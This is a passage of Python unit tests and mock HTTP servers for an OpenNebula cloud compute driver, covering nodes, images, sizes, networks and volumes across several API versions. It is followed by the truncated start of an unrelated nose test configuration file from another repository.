""" images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] self.assertEqual(image.id, '5') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['size'], '2048') self.assertEqual(image.extra['url'], 'file:///images/ubuntu/jaunty.img') image = images[1] self.assertEqual(image.id, '15') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['size'], '2048') self.assertEqual(image.extra['url'], 'file:///images/ubuntu/jaunty.img') def test_list_sizes(self): """ Test list_sizes functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) def test_list_locations(self): """ Test list_locations functionality. """ locations = self.driver.list_locations() self.assertEqual(len(locations), 1) location = locations[0] self.assertEqual(location.id, '0') self.assertEqual(location.name, '') self.assertEqual(location.country, '') def test_ex_list_networks(self): """ Test ex_list_networks functionality. """ networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') def test_ex_node_action(self): """ Test ex_node_action functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.ex_node_action(node, ACTION.STOP) self.assertTrue(ret) class OpenNebula_2_0_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v2.0 through v2.2. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_2_0_MockHttp, OpenNebula_2_0_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('2.0',)) def test_create_node(self): """ Test create_node functionality. 
""" image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) size = OpenNebulaNodeSize(id=1, name='small', ram=1024, cpu=1, disk=None, bandwidth=None, price=None, driver=self.driver) networks = list() networks.append(OpenNebulaNetwork(id=5, name='Network 5', address='192.168.0.0', size=256, driver=self.driver)) networks.append(OpenNebulaNetwork(id=15, name='Network 15', address='192.168.1.0', size=256, driver=self.driver)) context = {'hostname': 'compute-5'} node = self.driver.create_node(name='Compute 5', image=image, size=size, networks=networks, context=context) self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01') self.assertEqual(node.private_ips, []) self.assertTrue(len([s for s in self.driver.list_sizes() if s.id == node.size.id]) == 1) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-5') def test_destroy_node(self): """ Test destroy_node functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.destroy_node(node) self.assertTrue(ret) def test_list_nodes(self): """ Test list_nodes functionality. 
""" nodes = self.driver.list_nodes() self.assertEqual(len(nodes), 3) node = nodes[0] self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01') self.assertEqual(node.private_ips, []) self.assertTrue(len([size for size in self.driver.list_sizes() if size.id == node.size.id]) == 1) self.assertEqual(node.size.id, '1') self.assertEqual(node.size.name, 'small') self.assertEqual(node.size.ram, 1024) self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu, int)) self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu, int)) self.assertEqual(node.size.cpu, 1) self.assertEqual(node.size.vcpu, None) self.assertEqual(node.size.disk, None) self.assertEqual(node.size.bandwidth, None) self.assertEqual(node.size.price, None) self.assertTrue(len([image for image in self.driver.list_images() if image.id == node.image.id]) == 1) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-5') node = nodes[1] self.assertEqual(node.id, '15') self.assertEqual(node.name, 'Compute 15') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.2') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:02') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.2') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:02') self.assertEqual(node.private_ips, []) self.assertTrue(len([size for size in self.driver.list_sizes() if size.id == node.size.id]) == 1) self.assertEqual(node.size.id, '1') self.assertEqual(node.size.name, 'small') self.assertEqual(node.size.ram, 1024) self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu, int)) self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu, int)) self.assertEqual(node.size.cpu, 1) self.assertEqual(node.size.vcpu, None) self.assertEqual(node.size.disk, None) self.assertEqual(node.size.bandwidth, None) self.assertEqual(node.size.price, None) self.assertTrue(len([image for image in self.driver.list_images() if image.id == node.image.id]) == 1) self.assertEqual(node.image.id, '15') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-15') node = nodes[2] self.assertEqual(node.id, '25') self.assertEqual(node.name, 'Compute 25') 
self.assertEqual(node.state, NodeState.UNKNOWN) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.3') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:03') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.3') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:03') self.assertEqual(node.private_ips, []) self.assertEqual(node.size, None) self.assertEqual(node.image, None) context = node.extra['context'] self.assertEqual(context, {}) def test_list_images(self): """ Test list_images functionality. """ images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] self.assertEqual(image.id, '5') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['description'], 'Ubuntu 9.04 LAMP Description') self.assertEqual(image.extra['type'], 'OS') self.assertEqual(image.extra['size'], '2048') image = images[1] self.assertEqual(image.id, '15') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['description'], 'Ubuntu 9.04 LAMP Description') self.assertEqual(image.extra['type'], 'OS') self.assertEqual(image.extra['size'], '2048') def test_list_sizes(self): """ Test list_sizes functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 4) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[3] self.assertEqual(size.id, '4') self.assertEqual(size.name, 'custom') self.assertEqual(size.ram, 0) self.assertEqual(size.cpu, 0) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) def test_list_locations(self): """ Test list_locations functionality. """ locations = self.driver.list_locations() self.assertEqual(len(locations), 1) location = locations[0] self.assertEqual(location.id, '0') self.assertEqual(location.name, '') self.assertEqual(location.country, '') def test_ex_list_networks(self): """ Test ex_list_networks functionality. 
""" networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') class OpenNebula_3_0_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.0. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_0_MockHttp, OpenNebula_3_0_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.0',)) def test_ex_list_networks(self): """ Test ex_list_networks functionality. """ networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') self.assertEqual(network.extra['public'], 'YES') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') self.assertEqual(network.extra['public'], 'NO') def test_ex_node_set_save_name(self): """ Test ex_node_action functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) node = Node(5, None, None, None, None, self.driver, image=image) ret = self.driver.ex_node_set_save_name(node, 'test') self.assertTrue(ret) class OpenNebula_3_2_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.2. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_2_MockHttp, OpenNebula_3_2_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.2',)) def test_reboot_node(self): """ Test reboot_node functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) node = Node(5, None, None, None, None, self.driver, image=image) ret = self.driver.reboot_node(node) self.assertTrue(ret) def test_list_sizes(self): """ Test ex_list_networks functionality. 
""" sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) class OpenNebula_3_6_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.6. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_6_MockHttp, OpenNebula_3_6_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.6',)) def test_create_volume(self): new_volume = self.driver.create_volume(1000, 'test-volume') self.assertEqual(new_volume.id, '5') self.assertEqual(new_volume.size, 1000) self.assertEqual(new_volume.name, 'test-volume') def test_destroy_volume(self): images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] ret = self.driver.destroy_volume(image) self.assertTrue(ret) def test_attach_volume(self): nodes = self.driver.list_nodes() node = nodes[0] images = self.driver.list_images() image = images[0] ret = self.driver.attach_volume(node, image, 'sda') self.assertTrue(ret) def test_detach_volume(self): images = self.driver.list_images() image = images[1] ret = self.driver.detach_volume(image) self.assertTrue(ret) nodes = self.driver.list_nodes() # node with only a single associated image node = nodes[1] ret = self.driver.detach_volume(node.image) self.assertFalse(ret) def test_list_volumes(self): volumes = self.driver.list_volumes() self.assertEqual(len(volumes), 2) volume = volumes[0] self.assertEqual(volume.id, '5') self.assertEqual(volume.size, 2048) self.assertEqual(volume.name, 'Ubuntu 9.04 LAMP') volume = volumes[1] self.assertEqual(volume.id, '15') self.assertEqual(volume.size, 1024) self.assertEqual(volume.name, 'Debian Sid') class OpenNebula_3_8_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.8. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_8_MockHttp, OpenNebula_3_8_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.8',)) def test_list_sizes(self): """ Test ex_list_networks functionality. 
""" sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) class OpenNebula_1_4_MockHttp(MockHttp): """ Mock HTTP server for testing v1.4 of the OpenNebula.org compute driver. """ fixtures = ComputeFileFixtures('opennebula_1_4') def _compute(self, method, url, body, headers): """ Compute pool resources. """ if method == 'GET': body = self.fixtures.load('computes.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('compute_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _storage(self, method, url, body, headers): """ Storage pool resources. """ if method == 'GET': body = self.fixtures.load('storage.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('disk_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures.load('networks.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_15(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_25(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_25.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_5(self, method, url, body, headers): """ Storage entry resource. 
""" if method == 'GET': body = self.fixtures.load('disk_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('disk_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_2_0_MockHttp(MockHttp): """ Mock HTTP server for testing v2.0 through v3.2 of the OpenNebula.org compute driver. """ fixtures = ComputeFileFixtures('opennebula_2_0') def _compute(self, method, url, body, headers): """ Compute pool resources. """ if method == 'GET': body = self.fixtures.load('compute_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('compute_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _storage(self, method, url, body, headers): """ Storage pool resources. """ if method == 'GET': body = self.fixtures.load('storage_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('storage_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures.load('network_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_15(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_25(self, method, url, body, headers): """ Compute entry resource. 
""" if method == 'GET': body = self.fixtures.load('compute_25.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_5(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('storage_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('storage_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) class OpenNebula_3_0_MockHttp(OpenNebula_2_0_MockHttp): """ Mock HTTP server for testing v3.0 of the OpenNebula.org compute driver. """ fixtures_3_0 = ComputeFileFixtures('opennebula_3_0') def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures_3_0.load('network_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures_3_0.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures_3_0.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) class OpenNebula_3_2_MockHttp(OpenNebula_3_0_MockHttp): """ Mock HTTP server for testing v3.2 of the OpenNebula.org compute driver. """ fixtures_3_2 = ComputeFileFixtures('opennebula_3_2') def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _instance_type(self, method, url, body, headers): """ Instance type pool. 
""" if method == 'GET': body = self.fixtures_3_2.load('instance_type_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_3_6_MockHttp(OpenNebula_3_2_MockHttp): """ Mock HTTP server for testing v3.6 of the OpenNebula.org compute driver. """ fixtures_3_6 = ComputeFileFixtures('opennebula_3_6') def _storage(self, method, url, body, headers): if method == 'GET': body = self.fixtures.load('storage_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures_3_6.load('storage_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): if method == 'GET': body = self.fixtures_3_6.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_5_action(self, method, url, body, headers): body = self.fixtures_3_6.load('compute_5.xml') if method == 'POST': return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'GET': return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_15(self, method, url, body, headers): if method == 'GET': body = self.fixtures_3_6.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_10(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures_3_6.load('disk_10.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures_3_6.load('disk_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_3_8_MockHttp(OpenNebula_3_2_MockHttp): """ Mock HTTP server for testing v3.8 of the OpenNebula.org compute driver. """ fixtures_3_8 = ComputeFileFixtures('opennebula_3_8') def _instance_type(self, method, url, body, headers): """ Instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_small(self, method, url, body, headers): """ Small instance type. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_small.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_medium(self, method, url, body, headers): """ Medium instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_medium.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_large(self, method, url, body, headers): """ Large instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_large.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if __name__ == '__main__': sys.exit(unittest.main())
apache-2.0
wangjun/xiaohuangji
tests/test_config.py
7
2111
#-*-coding:utf-8-*- """ Copyright (c) 2012 wgx731 <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """ Nose test config file config sys path for testing """ import os import glob import sys TEST_DIR = os.path.abspath(os.path.dirname(__file__)) MAIN_CODE_DIR = os.path.abspath(os.path.join(TEST_DIR, os.path.pardir)) PLUGINS_CODE_DIR = os.path.abspath(os.path.join(MAIN_CODE_DIR, "plugins")) # Result refers to result returned by plugin WRONG_KEY_WORD_ERROR = "Missing or wrong keyword should not have result." WRONG_RESULT_ERROR = "Correct keyword should have result." WRONG_RESULT_FORMAT_ERROR = "Result should have correct format." class TestBase(object): @classmethod def clean_up(klass, path, wildcard): os.chdir(path) for rm_file in glob.glob(wildcard): os.unlink(rm_file) @classmethod def setup_class(klass): sys.stderr.write("\nRunning %s\n" % klass) @classmethod def teardown_class(klass): 